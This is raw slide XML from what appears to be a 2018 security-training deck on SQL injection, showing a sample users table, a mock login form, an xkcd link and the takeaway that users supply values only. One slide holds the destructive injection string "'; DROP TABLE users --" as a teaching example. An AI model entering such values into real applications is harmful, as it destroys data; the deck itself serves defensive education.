                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>email</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1118092">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>%\MpQ-&gt;3.L-5YRail!k}rH$/3~C?[cj\\.S%K</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>arup@pagerduty.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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0"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48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482" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="492" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13780935" y="3753205"/>
            <a:ext cx="6612831" cy="5257200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6612829" cy="5257199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="486" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6612830" cy="5257200"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6612829" cy="5257199"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="484" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="6612830" cy="5257200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="485" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="260436" y="940886"/>
                <a:ext cx="6091958" cy="4095901"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="487" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731442" y="907853"/>
              <a:ext cx="1149946" cy="625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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="488" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="2319418"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="489" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="1691723"/>
              <a:ext cx="1678720" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="490" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="3257500"/>
              <a:ext cx="1605360" cy="536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2600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="491" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="3865684"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="'; DROP TABLE users --"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14204770" y="7601773"/>
            <a:ext cx="4209282"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a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>'; DROP TABLE users --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="hahaha"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14276082" y="6081767"/>
            <a:ext cx="1426940"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000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>hahaha</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="shocked.png" descr="shocked.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710266" y="854926"/>
            <a:ext cx="9604918" cy="1200614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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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3" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="494"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9" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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500"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501" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="https://xkcd.com/327/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="504" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="505" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="954242" y="3383293"/>
            <a:ext cx="22577116" cy="694941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9" name="companies_house.png" descr="companies_house.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="36377"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="325966" y="1069770"/>
            <a:ext cx="23732068" cy="10217294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.png"/>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51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512" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="https://beta.companieshouse.gov.uk/company/10542519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://beta.companieshouse.gov.uk/company/10542519</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="515" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3883430" y="11409491"/>
            <a:ext cx="3527187" cy="677221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>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0"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52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522" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Users should provide values only. Don’t let users modify the SQL being executed."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Users should provide values only. Don’t let users modify the SQL being executed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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9"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530"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531" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-60987" y="4302959"/>
            <a:ext cx="25387877" cy="4100585"/>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534" name="SELECT first_name, last_name…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6808748" y="4707014"/>
            <a:ext cx="9441161" cy="329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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> first_name, last_name</a:t>
            </a:r>
          </a:p>
          <a:p>
